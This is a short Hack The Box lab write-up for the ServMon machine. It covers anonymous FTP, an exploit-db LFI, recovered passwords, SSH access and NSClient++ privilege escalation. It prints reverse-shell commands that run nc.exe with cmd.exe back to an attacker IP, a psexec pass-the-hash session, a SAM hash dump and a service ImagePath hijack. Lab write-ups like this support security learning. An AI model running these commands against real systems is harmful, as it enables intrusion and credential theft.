htb-servmon
As always we start with a nmap scan
We can ftp anonymous in and find, confidential.txt in ftp://10.10.10.184/Nathan
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
LFI is https://www.exploit-db.com/exploits/47774
so we have the passwords
L1k3B1gBut7s@W0rk is the pasword for user Nadine for service
ssh nadine@10.10.10.184 password with L1k3B1gBut7s@W0rk
next we upload nc.exe to box
then
https://www.exploit-db.com/exploits/46802
C:\Program Files\NSClient++>nscp web — password –display
Current password: ew2x6SsGTxjRwXOT
this password for login page on 8443 port
curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat –data-binary “c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe”
or run:
E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Requesting shares on 10.10.10.184..... [*] Found writable share ADMIN$ [*] Uploading file TEhcBLUe.exe [*] Opening SVCManager on 10.10.10.184..... [*] Creating service Lofh on 10.10.10.184..... [*] Starting service Lofh..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>cd c:\users\administrator\desktop c:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C Directory of c:\Users\Administrator\Desktop 08/04/2020 23:12 <DIR> . 08/04/2020 23:12 <DIR> .. 15/04/2020 05:58 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 27,399,426,048 bytes free c:\Users\Administrator\Desktop>type root.txt 62fb102b67c0760ac03f1cf05616dc65
c:\Temp>cqh -samdump SAM hashes: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Nadine:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Nathan:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Other way:
Enumerate the current user and find that the “Server Operators” user group can read and write system services, and can change services with System permissions and start. Here comes the idea: find a system permission service that has not been started, modify the content to Trojan or nc, and then execute:
*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f The operation completed successfully. *Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876 listening on [any] 9876 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687 Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32>hostname hostname ServMon C:\WINDOWS\system32>
…
Author : Puckiestyle